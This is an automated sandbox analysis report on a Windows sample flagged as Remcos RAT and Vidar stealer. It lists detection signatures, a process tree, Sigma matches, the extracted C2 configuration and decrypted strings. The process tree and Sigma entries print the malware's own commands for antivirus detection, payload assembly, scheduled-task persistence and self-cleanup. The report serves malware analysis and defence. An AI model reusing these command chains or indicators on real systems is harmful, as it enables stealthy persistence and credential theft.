Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mg9LPWGtPB.exe

Overview

General Information

Sample name:mg9LPWGtPB.exe
renamed because original name is a hash value
Original sample name:5715f2100028b28f508559c4782daa5e.exe
Analysis ID:1472119
MD5:5715f2100028b28f508559c4782daa5e
SHA1:f15aa6ce0470b63d98406f3a4821675a2bb45732
SHA256:3ef1d040731916fee2fe1317c53a0e363f05fd12f87b84563af86ac5d49f74c2
Tags:32exetrojan
Infos:

Detection

Remcos, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • mg9LPWGtPB.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\mg9LPWGtPB.exe" MD5: 5715F2100028B28F508559C4782DAA5E)
    • cmd.exe (PID: 4052 cmdline: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2128 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2604 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6380 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 180 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5324 cmdline: cmd /c md 787041 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5256 cmdline: findstr /V "SenatorsRamAspectYounger" Boat MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5708 cmdline: cmd /c copy /b Buffalo + Sims + Imagine 787041\l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hist.pif (PID: 4368 cmdline: 787041\Hist.pif 787041\l MD5: B06E67F9767E5023892D9698703AD098)
      • timeout.exe (PID: 6516 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • EHIJJDGDHD.exe (PID: 4752 cmdline: "C:\ProgramData\EHIJJDGDHD.exe" MD5: 384DAB1B42A5204901682D527A14752E)
      • cmd.exe (PID: 6972 cmdline: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5452 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 516 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 4352 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3848 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5400 cmdline: cmd /c md 661592 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 412 cmdline: findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5608 cmdline: cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Bk.pif (PID: 2296 cmdline: 661592\Bk.pif 661592\h MD5: B06E67F9767E5023892D9698703AD098)
          • cmd.exe (PID: 6640 cmdline: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6656 cmdline: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • schtasks.exe (PID: 3660 cmdline: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 1680 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • cmd.exe (PID: 3364 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6804 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 1100 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SolarSys.pif (PID: 3784 cmdline: "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y" MD5: B06E67F9767E5023892D9698703AD098)
  • wscript.exe (PID: 3288 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SolarSys.pif (PID: 6984 cmdline: "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y" MD5: B06E67F9767E5023892D9698703AD098)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "704b02283cd90e61ff947b4e87e7b990"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 9 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.Hist.pif.4d20000.5.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.Hist.pif.4953a50.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.2.Hist.pif.4953a50.4.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6640, ProcessName: cmd.exe
                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6640, ProcessName: cmd.exe
                    Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6640, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6656, ProcessName: schtasks.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", ProcessId: 1100, ProcessName: wscript.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 787041\Hist.pif 787041\l, CommandLine: 787041\Hist.pif 787041\l, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4052, ParentProcessName: cmd.exe, ProcessCommandLine: 787041\Hist.pif 787041\l, ProcessId: 4368, ProcessName: Hist.pif
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 3660, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\EHIJJDGDHD.exe" , ParentImage: C:\ProgramData\EHIJJDGDHD.exe, ParentProcessId: 4752, ParentProcessName: EHIJJDGDHD.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, ProcessId: 6972, ProcessName: cmd.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6640, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6656, ProcessName: schtasks.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", ProcessId: 1100, ProcessName: wscript.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4052, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 180, ProcessName: findstr.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 44 BC 7A D9 BF 60 0C CC 22 CD 04 87 10 1C CE 33 25 89 CF 94 EB A8 65 9A 6F 24 FE 66 16 6A F5 A2 3E 93 E2 9E DF 83 B8 E5 F4 0D 8E 6F AF 6B 2A FA AD 16 25 8B 31 32 22 13 7A B6 88 BF 79 22 B4 DE EB 5A 3D 30 D3 2B 4D 11 D3 AB EE DF B5 27 50 B3 3E D6 85 57 05 70 FC 13 ED E2 F1 E4 64 08 DB E4 13 E1 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ProcessId: 2296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-6MRD2P\exepath

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://steamcommunity.com/profiles/76561199735694209Avira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199735694209/inventory/Avira URL Cloud: Label: malware
                    Source: https://t.me/puffclouAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "704b02283cd90e61ff947b4e87e7b990"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\EHIJJDGDHD.exeReversingLabs: Detection: 33%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Windows_Services_AS[1].exeReversingLabs: Detection: 33%
                    Multi AV Scanner detection for submitted file
                    Source: mg9LPWGtPB.exeReversingLabs: Detection: 15%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
                    Machine Learning detection for sample
                    Source: mg9LPWGtPB.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: INSERT_KEY_HERE
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetProcAddress
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: LoadLibraryA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: lstrcatA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: OpenEventA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateEventA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CloseHandle
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Sleep
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetUserDefaultLangID
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: VirtualAllocExNuma
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: VirtualFree
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetSystemInfo
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: VirtualAlloc
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HeapAlloc
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetComputerNameA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: lstrcpyA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetProcessHeap
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetCurrentProcess
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: lstrlenA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ExitProcess
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GlobalMemoryStatusEx
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetSystemTime
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SystemTimeToFileTime
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: advapi32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: gdi32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: user32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: crypt32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ntdll.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetUserNameA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateDCA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetDeviceCaps
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ReleaseDC
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CryptStringToBinaryA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sscanf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: NtQueryInformationProcess
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: VMwareVMware
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HAL9TH
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: JohnDoe
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DISPLAY
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %hu/%hu/%hu
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetEnvironmentVariableA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetFileAttributesA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GlobalLock
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HeapFree
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetFileSize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GlobalSize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateToolhelp32Snapshot
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: IsWow64Process
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Process32Next
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetLocalTime
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FreeLibrary
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetTimeZoneInformation
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetSystemPowerStatus
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetVolumeInformationA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetWindowsDirectoryA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Process32First
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetLocaleInfoA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetUserDefaultLocaleName
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetModuleFileNameA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DeleteFileA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FindNextFileA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: LocalFree
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FindClose
